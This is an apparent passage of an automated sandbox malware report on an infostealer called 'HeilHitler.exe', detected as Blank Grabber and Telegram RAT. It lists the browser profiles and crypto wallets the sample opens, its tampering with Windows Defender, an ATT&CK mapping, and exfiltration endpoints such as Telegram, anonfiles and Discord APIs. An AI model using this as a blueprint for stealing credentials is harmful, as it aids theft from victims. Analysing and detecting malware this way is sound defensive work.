              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashesJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\defaultJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backupsJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqliteJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_stateJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storageJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibagJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmpJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\dbJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\gleanJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: Yara matchFile source: 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HeilHitler.exe PID: 7448, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000000.00000003.1680543056.0000028B92082000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1680543056.0000028B92084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2024405519.000001BD43030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2017807345.000001BD43E2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HeilHitler.exe PID: 7432, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: HeilHitler.exe PID: 7448, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI74322\rarreg.key, type: DROPPED
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: HeilHitler.exe PID: 7448, type: MEMORYSTR
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF42B5D bind,WSAGetLastError,1_2_00007FFDFAF42B5D

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		4
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts2
              Native API              		Boot or Logon Initialization Scripts1
              Access Token Manipulation              		11
              Deobfuscate/Decode Files or Information              		LSASS Memory3
              File and Directory Discovery              		Remote Desktop Protocol3
              Data from Local System              		21
              Encrypted Channel              		Exfiltration Over Bluetooth1
              System Shutdown/Reboot
              Email AddressesDNS ServerDomain Accounts22
              Command and Scripting Interpreter              		Logon Script (Windows)11
              Process Injection              		21
              Obfuscated Files or Information              		Security Account Manager47
              System Information Discovery              		SMB/Windows Admin Shares1
              Clipboard Data              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell              		Login HookLogin Hook11
              Software Packing              		NTDS151
              Security Software Discovery              		Distributed Component Object ModelInput Capture5
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Timestomp              		LSA Secrets2
              Process Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials141
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
              Virtualization/Sandbox Evasion              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation              		Proc Filesystem1
              System Network Configuration Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
              Process Injection              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1556385 Sample: HeilHitler.exe Startdate: 15/11/2024 Architecture: WINDOWS Score: 100 69 ip-api.com 2->69 71 discord.com 2->71 85 Found malware configuration 2->85 87 Sigma detected: Capture Wi-Fi password 2->87 89 Multi AV Scanner detection for submitted file 2->89 91 9 other signatures 2->91 11 HeilHitler.exe 22 2->11         started        signatures3 process4 file5 61 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->61 dropped 63 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->63 dropped 65 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->65 dropped 67 16 other files (none is malicious) 11->67 dropped 107 Modifies Windows Defender protection settings 11->107 109 Adds a directory exclusion to Windows Defender 11->109 111 Tries to harvest and steal WLAN passwords 11->111 113 Removes signatures from Windows Defender 11->113 15 HeilHitler.exe 105 11->15         started        signatures6 process7 dnsIp8 73 ip-api.com 208.95.112.1, 50936, 80 TUT-ASUS United States 15->73 75 discord.com 162.159.128.233, 443, 50937 CLOUDFLARENETUS United States 15->75 77 Found many strings related to Crypto-Wallets (likely being stolen) 15->77 79 Tries to harvest and steal browser information (history, passwords, etc) 15->79 81 Modifies Windows Defender protection settings 15->81 83 5 other signatures 15->83 19 cmd.exe 1 15->19         started        22 cmd.exe 1 15->22         started        24 cmd.exe 15->24         started        26 23 other processes 15->26 signatures9 process10 signatures11 93 Suspicious powershell command line found 19->93 95 Encrypted powershell cmdline option found 19->95 97 Bypasses PowerShell execution policy 19->97 105 2 other signatures 19->105 28 conhost.exe 19->28         started        31 powershell.exe 23 19->31         started        99 Modifies Windows Defender protection settings 22->99 101 Removes signatures from Windows Defender 22->101 33 powershell.exe 23 22->33         started        44 2 other processes 22->44 35 getmac.exe 24->35         started        37 conhost.exe 24->37         started        103 Tries to harvest and steal WLAN passwords 26->103 39 systeminfo.exe 26->39         started        41 powershell.exe 26->41         started        46 44 other processes 26->46 process12 file13 48 WmiPrvSE.exe 28->48         started        115 Loading BitLocker PowerShell Module 31->115 117 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 35->117 119 Writes or reads registry keys via WMI 35->119 57 C:\Users\user\AppData\...\0qdpbrpq.cmdline, Unicode 41->57 dropped 50 csc.exe 41->50         started        59 C:\Users\user\AppData\Local\Temp\8KaTn.zip, RAR 46->59 dropped signatures14 process15 file16 55 C:\Users\user\AppData\Local\...\0qdpbrpq.dll, PE32 50->55 dropped 53 cvtres.exe 50->53         started        process17

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              HeilHitler.exe47%ReversingLabsWin32.Trojan.Generic

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI74322\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74322\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74322\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74322\_decimal.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74322\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74322\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74322\_queue.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74322\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74322\_sqlite3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74322\_ssl.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74322\libcrypto-1_1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74322\libffi-7.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74322\libssl-1_1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74322\python310.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74322\select.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74322\sqlite3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74322\unicodedata.pyd0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt00%Avira URL Cloudsafe
              http://www.microsoftOWNLO~1.TXTy.0%Avira URL Cloudsafe
              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsC0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              		199.232.214.172
              		truefalse
                		high
                discord.com
                		162.159.128.233
                		truefalse
                  		high
                  ip-api.com
                  		208.95.112.1
                  		truefalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabHeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://github.com/Blank-c/BlankOBFHeilHitler.exe, 00000001.00000003.1689251568.000001BD43570000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1689605920.000001BD43351000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1689683339.000001BD43570000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1689516521.000001BD43569000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1689067447.000001BD4393E000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://api.telegram.org/bot%s/%sHeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          https://www.avito.ru/HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C7C000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/ac/?q=HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0HeilHitler.exefalse
                                		high
                                http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#HeilHitler.exefalse
                                  		high
                                  http://www.microsoft.copowershell.exe, 00000026.00000002.1824448366.00000287197FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://python.org/dev/peps/pep-0263/HeilHitler.exe, 00000001.00000002.2036487623.00007FFDFB784000.00000040.00000001.01000000.00000004.sdmpfalse
                                      		high
                                      https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#HeilHitler.exe, 00000001.00000002.2022344283.000001BD40F50000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.leboncoin.fr/HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          https://tools.ietf.org/html/rfc2388#section-4.4HeilHitler.exe, 00000001.00000002.2024405519.000001BD43030000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://weibo.com/HeilHitler.exe, 00000001.00000003.1907250502.000001BD43701000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CC4000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2019563496.000001BD43701000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.anonfiles.com/uploadHeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.msn.comHeilHitler.exe, 00000001.00000002.2032925274.000001BD44538000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.1824453418.0000026DC0C84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1887725142.000002872B8AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871D05B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1887725142.000002872B769000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://discord.com/api/v9/users/HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963HeilHitler.exe, 00000001.00000002.2031419097.000001BD43930000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.1766127413.0000026DB0C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871B6F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.amazon.ca/HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenameHeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42BF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyHeilHitler.exe, 00000001.00000002.2031557342.000001BD43A30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000026.00000002.1830812751.000002871D000000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871CD42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000007.00000002.1766127413.0000026DB0E39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000026.00000002.1830812751.000002871D000000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871CD42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codeHeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://go.micropowershell.exe, 00000026.00000002.1830812751.000002871C5C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerHeilHitler.exe, 00000001.00000002.2022344283.000001BD40F50000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.amazon.com/HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://contoso.com/Iconpowershell.exe, 00000026.00000002.1887725142.000002872B769000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://httpbin.org/HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sHeilHitler.exe, 00000000.00000003.1680320755.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                                                                                        		high
                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_moduleHeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016HeilHitler.exe, 00000001.00000003.1907543224.000001BD434D3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2024405519.000001BD43090000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434A1000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907001507.000001BD43734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesHeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42BF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.ecosia.org/newtab/HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brHeilHitler.exe, 00000001.00000003.1723565686.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1741897379.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1730926379.000001BD4367B000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43737000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718513847.000001BD436DA000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1724146953.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1751574081.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1720857356.000001BD43737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000026.00000002.1830812751.000002871D000000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871CD42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535HeilHitler.exe, 00000001.00000002.2028781492.000001BD43623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
